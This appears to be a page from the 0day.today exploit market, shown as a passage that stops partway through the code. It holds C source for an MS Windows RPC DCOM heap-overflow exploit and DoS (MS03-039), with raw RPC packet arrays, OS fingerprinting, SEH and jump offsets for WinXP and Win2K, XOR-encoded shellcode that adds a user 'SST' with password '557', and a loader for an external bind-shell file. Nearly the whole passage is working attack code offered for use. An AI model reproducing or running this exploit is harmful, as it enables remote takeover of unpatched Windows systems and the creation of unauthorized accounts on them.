[ home ]  [ private ]  [ 0Day ]  [ discount ]  [ Get Gold ]  [ platforms ]  [ pentest ]  [ search ]  [ faq ]  [ contact ]  [ style ]  [ Prices in Gold ]   db: 39 583    
0day Today Exploit DB Official Facebook
0day Today Exploit DB Official Twitter
0day Today Exploit DB Official RSS Channel
Tor
We DO NOT use Telegram or any messengers / social networks!
We DO NOT use Telegram or any messengers / social networks!

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

 
0day.today - Biggest Exploit Database in the World.
Select your language:  
English
English
Русский
Русский
Deutsch
Deutsch
Türkçe
Türkçe
Français
Français
Italiano
Italiano
Español
Español
Romania
Romania
Polskie
Polskie
العربية
العربية
Japan
Japan
China
China
Things you should know about 0day.today:
  • We use one main domain: http://0day.today
  • Most of the materials is completely FREE
  • If you want to purchase the exploit / get V.I.P. access or pay for any other service,
    you need to buy or earn GOLD
We accept currencies: [contact admin to find more]
           
We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
I am registered user of 0day.today. I don't want to see this screen in future.
What to do first?
  1. Read the [ agreement ]
  2. Read the [ Submit ] rules
  3. Visit the [ faq ] page
  4. [ Register ] profile
  5. Get [ GOLD ]
  6. If you want to [ sell ]
  7. If you want to [ buy ]
  8. If you lost [ Account ]
  9. Any questions [ admin@0day.today ]


Main links


You can contact us by

Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
Mail:
mr.inj3ct0r@gmail.com
Facebook:
Inj3ct0rs
Twitter:
Inj3ct0r
Telegram:
We DO NOT use Telegram or any messengers / social networks!
0day Today Exploits Market and 0day Exploits Database

MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)

Author
n/a
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-8353
Category
remote exploits
Date add
08-10-2003
Platform
unsorted
===========================================================
MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)
===========================================================

/*  Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3)  */
/*                    Must be used with the associated shell                        */
/*                                                                                                  */
/*           This exploit works against unpatched systems (MS03-039)     */
/*             And cause a Denial of Service on patched systems (rpc3)     */


#include <stdio.h> 
#include <winsock2.h> 
#include <windows.h> 
#include <process.h> 
#include <string.h> 
#include <winbase.h> 

FILE *fp1; 
unsigned char bindstr[]={ 
0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00, 
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00, 
0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00, 
0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00}; 

unsigned char request1[]={ 
0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03 
,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00 
,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45 
,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E 
,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D 
,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41 
,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00 
,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45 
,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00 
,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00 
,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29 
,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00 
,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF 
,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09 
,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00 
,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00 
,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00 
,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00 
,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03 
,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00 
,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E 
,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00 
,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00 
,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00 
,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00 
,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00 
,0x00,0x00,0x00,0x00,0x00,0x00}; 

unsigned char request2[]={ 
0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00 
,0x00,0x00,0x5C,0x00,0x5C,0x00}; 

unsigned char request3[]={ 
0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00, 
0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00 
,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00 
,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00}; 


unsigned char request4[]={ 
0x01,0x10 
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00 
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C 
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00 
}; 
void XOR(unsigned char *buf,int offset,int lenght,unsigned char mask) 
{ 
for(int i=offset;i<(offset+lenght);i++) 
buf[i]=buf[i]^mask; 
} 
DWORD GETSTRCS(char *buf) 
{ 
DWORD cs=0; 
bool cld=false; 
for(unsigned int i=0;i<strlen(buf);i++) 
{ 
for(int z=0;z<13;z++) 
{ 
if(cs&1) cld=true; 
cs=cs>>1; 
if(cld) cs=cs|0x80000000; 
cld=false; 
} 
cs+=buf[i]; 
} 
return cs; 
} 

struct { 
DWORD seh; 
DWORD jmp; 
DWORD heap; 
char target[200]; 
} target_os[]= 
{ 
{ 
0x005Bfd2c, 
0x00081eeb, 
0x00180000, 
"WinXP" 
}, 
{ 
0x0095fd3c, 
0x00081eeb, 
0x00170000, 
"Win2K" 
} 
},v; 
unsigned char rawData1[]= 
"\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00" 
"\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00" 

"\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e" 
"\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01" 
"\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30" 
"\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2" 

//SHELLCODE From SAM ,THANKs ! 
//Add user SST,password is 557, 
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 

"\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D" 
"\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C" 
"\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99" 
"\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9" 
"\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6" 
"\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED" 
"\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE" 
"\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12" 
"\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED" 
"\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA" 
"\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB" 
"\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66" 
"\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81" 
"\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A" 
"\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3" 
"\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78" 
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D" 
"\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99" 
"\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12" 
"\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99" 
"\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66" 

"\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce" 
"\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6" 
"\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7" 
"\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4" 
"\x7f\x19\x95\xd5\x17\x53\xe6\x6a" 
"\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca" 
"\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" // 
"\x90\x90\x90\x90\x90\x90\x90\x90" 
"\x77\xe0\x43\x00\x00\x10\x5c\x00" 
"\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26 
"\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os 


//FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic 
//"Utilization of released heap structure and exploit of universal Heap overflow in windows ". 
"\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA" 
"\xEB\x05\xE8\xEB\xFF\xFF\xFF" 
"\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14" 
"\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA" 
"\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF" 
"\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99" 
"\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1" 
"\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7" 
"\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99" 
"\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA" 
"\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9" 
"\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1" 
"\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8" 
"\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99" 
"\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9" 
"\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99" 
"\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12" 
"\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98" 
"\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99" 
"\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12" 
"\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12" 
"\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA" 
"\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD" 
"\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A" 
"\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2" 
"\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12" 
"\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31" 
"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66" 

"\x04\x04\x00\x70\x00\x04\x40" 
"\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00" 

"\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71"; 


int version(char ip[16], int sock) 
{ 
//un poco de ettercap... 


unsigned char peer0_0[] = { 
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00, 
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18, 
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00, 
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11, 
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57, 
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00, 
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41, 
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d, 
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00, 
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97, 
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0, 
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00 }; 


unsigned char peer0_1[] = { 
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00, 
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41, 
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20, 
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53, 
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00, 
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11, 
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb, 
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00, 
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00, 
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00, 
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00, 
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 
0x07, 0x00 }; 

/* 

unsigned char win2kvuln[] = { 
0x04, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00, 
0x00, 0x00, 0x00, 0x00, 
0x04, 0x5d, 0x88, 0x8a, 
0xeb, 0x1c, 0xc9, 0x11, 
0x9f, 0xe8, 0x08, 0x00, 
0x2b, 0x10, 0x48, 0x60, 
0x02, 0x00, 0x00, 0x00}; 
*/ 
fd_set fds2; 
unsigned char buf[1024]; 

int l; 
struct timeval tv2; 
FD_ZERO(&fds2); 
FD_SET(sock, &fds2); 
tv2.tv_sec = 6; 
tv2.tv_usec = 0; 

memset(buf,'\0',sizeof(buf)); 
send(sock,(char *)peer0_0,sizeof(peer0_0),0); 
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
{ 
l=recv (sock, (char *)buf, sizeof (buf),0); 
// for(i=0;i<52;i++) 
// { 
// if (i==28) i=i+4; 
// if (buf[i+32]!=win2kvuln) 
// { 
send(sock,(const char *)peer0_1,sizeof(peer0_1),0); 
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0) 
{ 
memset(buf,'\0',sizeof(buf)); 
l=recv (sock, (char *)buf, sizeof (buf),0); 
if (l==32) 
{ 
closesocket(sock); 
return(1);//winxp 
} 
else 
{ 
#ifdef WIN32 
closesocket(sock); 
#else 
close(sock); 
#endif 
return(0);//win2kby default. Nt4 not added.. 
} 
} 
else return(-1); 
// } 


//} 
// closesocket(sock); 
// return(0);//win2k 
} 
closesocket(sock); 
return(-1); //Unknown 
} 
/********************************************************************************/ 
int attack(char *ip1,bool atack) 
{ 
unsigned char rawData[1036]; 
memcpy(rawData,rawData1,1036); 
unsigned char shellcode[50000]; 
char ip[200]; 
strcpy(ip,ip1); 
WSADATA WSAData; 
SOCKET sock; 
int len,len1; 
SOCKADDR_IN addr_in; 
short port=135; 
unsigned char buf1[50000]; 
unsigned char buf2[50000]; 

printf("%s\n",ip); 
//printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n"); 
//printf("Code by FlashSky,Flashsky xfocus org\n"); 
//printf("Welcome to our Site: http://www.xfocus.org\n"); 
//printf("Welcome to our Site: http://www.venustech.com.cn\n"); 
/* if(argc!=3) 
{ 
printf("%s targetIP targetOS\ntargets:\n",argv[0]); 
for(int i=0;i<sizeof(target_os)/sizeof(v);i++) 
printf("%d - %s\n",i,target_os.target); 
printf("\n%x\n",GETSTRCS(argv[1])); 
return; 
} 
*/ 
/* if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0) 
{ 
printf("WSAStartup error.Error:%d\n",WSAGetLastError()); 
return; 
} 
*/ 
addr_in.sin_family=AF_INET; 
addr_in.sin_port=htons(port); 
addr_in.sin_addr.S_un.S_addr=inet_addr(ip); 

if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET) 
{ 
printf("Socket failed.Error:%d\n",WSAGetLastError()); 
return 0; 
} 
len1=sizeof(request1); 

len=sizeof(rawData); 

if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR) 
{ 
printf("%s - connect failed\n",ip); 
return 0; 
} 

int vers=!version(ip,sock); 

// printf("%d\n",vers); 
// return; 
// int vers=1; 

FILE *fp; 

//?? ?? ? ??? 
// fp=fopen("shellcode","rb"); 
// fread(rawData,1,1036,fp); 
// fclose(fp); 
//???? ??? ???? ?? ??????????? ?????? ?????! 

fp=fopen("bshell2","rb"); 
int sz=fread(shellcode,1,1024,fp); 
fclose(fp); 
// printf("%d\n",sz); 
for(int i=0;i<sz;i++) 
rawData[i+0x71]=shellcode[i]; 
// fp=fopen("badfile.exe","rb"); 
// unsigned int sz1=fread(shellcode,1,50000,fp); 
// fclose(fp); 
// for(i=0;i<sz1;i++) 
// rawData[i+0x240]=shellcode; 

// fp=fopen("pac","wb"); 
// fwrite(rawData,1,1036,fp); 
// fclose(fp); 

// return; 


//??? ? ? ? ????? ? ???  ??? ???????? HEAP'a 
// DWORD heap=0x00180000; 
// int k=vers; 
// vers=1; 
// *(DWORD *)(rawData+0xae)=target_os[vers].heap; 
*(DWORD *)(rawData+0x71+0x1e)=target_os[vers].heap; 
//?????? ??? ?????? ? ? ???, ??? ?? ??? ??????? ??? ?  
XOR(rawData,0x71,sz,0x99); 
// XOR(rawData,0x240,sz1,0x99); 
//? ? ?? ? ? ??? ? ??? ?? ??? ? ? SEH ? JMP 
DWORD seh=target_os[vers].seh; 
DWORD jmp=target_os[vers].jmp; 
*(DWORD *)(rawData+0x22a)=jmp; 
*(DWORD *)(rawData+0x22e)=seh; 
